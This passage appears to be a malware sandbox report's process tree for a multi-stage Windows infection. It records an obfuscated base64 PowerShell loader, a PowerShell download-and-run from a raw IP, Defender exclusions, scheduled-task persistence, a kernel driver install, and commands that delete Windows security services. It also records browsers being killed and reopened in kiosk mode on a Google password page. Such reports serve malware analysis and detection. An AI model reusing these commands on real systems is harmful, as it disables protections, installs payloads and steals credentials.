uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3300
      - C:\Users\Admin\AppData\Local\Temp\10465960101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10465960101\amnew.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:4660
        
        C:\Users\Admin\AppData\Local\Temp\10052500101\f7e9929970.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10052500101\f7e9929970.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10052500101\f7e9929970.exe"
        9⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:448
        
        C:\Users\Admin\AppData\Local\Temp\10052510101\25c18530d2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10052510101\25c18530d2.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:6080
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10052510101\25c18530d2.exe"
        9⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2452
      - C:\Users\Admin\AppData\Local\Temp\10466520101\Lkp52R3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10466520101\Lkp52R3.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3136
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5036
        
        C:\Users\Admin\AppData\Local\Temp\ahcgjm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ahcgjm.exe"
        8⤵
        UAC bypass
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:2996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ahcgjm.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ahcgjm.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\$77Steam.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77Steam.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5716
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Steam" /tr "C:\Users\Admin\AppData\Local\$77Steam.exe"
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3E3D.tmp.bat""
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2712
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        9⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:5800
      - C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe"
        6⤵
        Executes dropped EXE
        
        PID:5932
        
        C:\Users\Admin\AppData\Local\Temp\onefile_5932_133883593118642454\ZSoeRVBe.exe
        
        C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:5044
      - C:\Users\Admin\AppData\Local\Temp\10467130101\bb3887a024.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10467130101\bb3887a024.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn ACNCNmavqEG /tr "mshta C:\Users\Admin\AppData\Local\Temp\PX5vRQFoq.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4736
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn ACNCNmavqEG /tr "mshta C:\Users\Admin\AppData\Local\Temp\PX5vRQFoq.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1792
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\PX5vRQFoq.hta
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'S2L7PW2FS6QGWBIZIAWW7ERQYOPZMYC3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\TempS2L7PW2FS6QGWBIZIAWW7ERQYOPZMYC3.EXE
        
        "C:\Users\Admin\AppData\Local\TempS2L7PW2FS6QGWBIZIAWW7ERQYOPZMYC3.EXE"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5668
      - C:\Users\Admin\AppData\Local\Temp\10467140101\bafa6cb643.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10467140101\bafa6cb643.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2000
      - C:\Users\Admin\AppData\Local\Temp\10467150101\f43444a477.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10467150101\f43444a477.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5884
      - C:\Users\Admin\AppData\Local\Temp\10467160101\a1a23f99c9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10467160101\a1a23f99c9.exe"
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        
        PID:3380
      - C:\Users\Admin\AppData\Local\Temp\10467170101\f3cca57da9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10467170101\f3cca57da9.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5748
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1868
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3364
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1324
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5676
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4776
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:5132
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:5408
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {7408627d-8cb7-483e-8fcd-82e940dda604} -parentPid 5408 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5408" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:5952
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2468 -prefsLen 27135 -prefMapHandle 2472 -prefMapSize 270279 -ipcHandle 2496 -initialChannelId {6f389d0f-2fdf-40c3-92a9-09b30293031a} -parentPid 5408 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5408" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:1692
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3860 -prefsLen 25164 -prefMapHandle 3864 -prefMapSize 270279 -jsInitHandle 3868 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3876 -initialChannelId {7ab66168-d46f-4bb4-9f22-0970f74907b3} -parentPid 5408 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5408" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        Checks processor information in registry
        
        PID:1540
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4040 -prefsLen 27276 -prefMapHandle 4044 -prefMapSize 270279 -ipcHandle 4132 -initialChannelId {f3a86a72-2cbf-45ea-9101-cc2d9f1d8776} -parentPid 5408 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5408" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:2720
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3076 -prefsLen 34775 -prefMapHandle 3144 -prefMapSize 270279 -jsInitHandle 3268 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3284 -initialChannelId {d9663ee5-4c8e-40b4-ae51-097235187a57} -parentPid 5408 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5408" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        Checks processor information in registry
        
        PID:612
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 3380 -prefsLen 35012 -prefMapHandle 5168 -prefMapSize 270279 -ipcHandle 4892 -initialChannelId {633645b2-0dd4-4894-b0e2-ee92c60b1be9} -parentPid 5408 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5408" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        Checks processor information in registry
        
        PID:4624
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5500 -prefsLen 32952 -prefMapHandle 5504 -prefMapSize 270279 -jsInitHandle 5508 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5516 -initialChannelId {d4e7081d-523e-4bd1-9449-18d008aec5dc} -parentPid 5408 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5408" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        Checks processor information in registry
        
        PID:5804
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5720 -prefsLen 32952 -prefMapHandle 5724 -prefMapSize 270279 -jsInitHandle 5728 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5556 -initialChannelId {c08fb2e9-3a12-43e0-8104-af366fb08aba} -parentPid 5408 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5408" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        Checks processor information in registry
        
        PID:5864
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2976 -prefsLen 32952 -prefMapHandle 5888 -prefMapSize 270279 -jsInitHandle 5892 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5900 -initialChannelId {43e5fe9b-3e65-4545-847d-b9605145e00e} -parentPid 5408 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5408" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        Checks processor information in registry
        
        PID:3380
      - C:\Users\Admin\AppData\Local\Temp\10467180101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10467180101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4500
        
        C:\Users\Admin\AppData\Local\Temp\272.exe
        
        "C:\Users\Admin\AppData\Local\Temp\272.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5004
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\213A.tmp\213B.tmp\213C.bat C:\Users\Admin\AppData\Local\Temp\272.exe"
        8⤵
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\272.exe
        
        "C:\Users\Admin\AppData\Local\Temp\272.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4632
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2272.tmp\2273.tmp\2274.bat C:\Users\Admin\AppData\Local\Temp\272.exe go"
        10⤵
        Drops file in Program Files directory
        
        PID:740
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:2840
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:5996
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:1248
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:3632
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:2464
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5344
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5948
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:1960
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:4880
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:1764
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:1428
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:2752
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:3020
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:4100
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:2988
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:2296
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:5276
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:2664
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:4360
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:2196
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:5032
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:4352
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:4676
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:4736
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:5312
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:3132
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:5336
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:4908
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:2320
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:432
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:3244
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:3276
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:1956
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:4104
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:3576
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:5088
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:1800
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:2840
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:5996
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:3760
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:1476
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:3320
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:2880
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:5448
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:5908
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:3668
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:2240
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:1232
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:464
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:3520
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:3784
        
